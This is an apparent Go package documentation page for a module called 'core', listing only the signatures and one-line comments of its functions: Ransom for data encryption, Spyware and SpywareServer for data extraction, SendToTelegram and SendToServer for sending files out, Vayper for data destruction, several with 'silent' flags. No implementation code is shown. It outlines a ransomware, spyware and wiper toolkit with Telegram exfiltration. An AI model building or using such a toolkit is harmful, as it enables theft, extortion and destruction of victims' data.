core

package
v0.0.0-...-cce28a0 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Sep 3, 2025 License: Apache-2.0 Imports: 13 Imported by: 0

Documentation

Index

Constants

View Source
const (
	ColorReset  = "\033[0m"
	ColorRed    = "\033[31m"
	ColorGreen  = "\033[32m"
	ColorYellow = "\033[33m"
	ColorWhite  = "\033[37;1m"
)

ANSI color codes

Variables

This section is empty.

Functions

func Ransom

func Ransom() error

Ransom contains logic for data encryption

func SendFilesConcurrently

func SendFilesConcurrently(token, chatID string, filePaths []string, silent bool) []error

SendFilesConcurrently sends multiple files to Telegram concurrently

func SendToServer

func SendToServer(server, port, encryption, filePath string, silent bool) error

SendToServer sends a file to the specified server

func SendToTelegram

func SendToTelegram(token, chatID, filePath string, silent bool) error

SendToTelegram sends a file to the specified Telegram chat using multipart/form-data

func Spyware

func Spyware(dumpType, token, chatID string, silent bool) error

Spyware handles data extraction and sends to Telegram

func SpywareServer

func SpywareServer(dumpType, server, port, encryption string, silent bool) error

SpywareServer handles data extraction and sends to server

func Vayper

func Vayper() error

Vayper contains logic for data destruction

Types

This section is empty.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL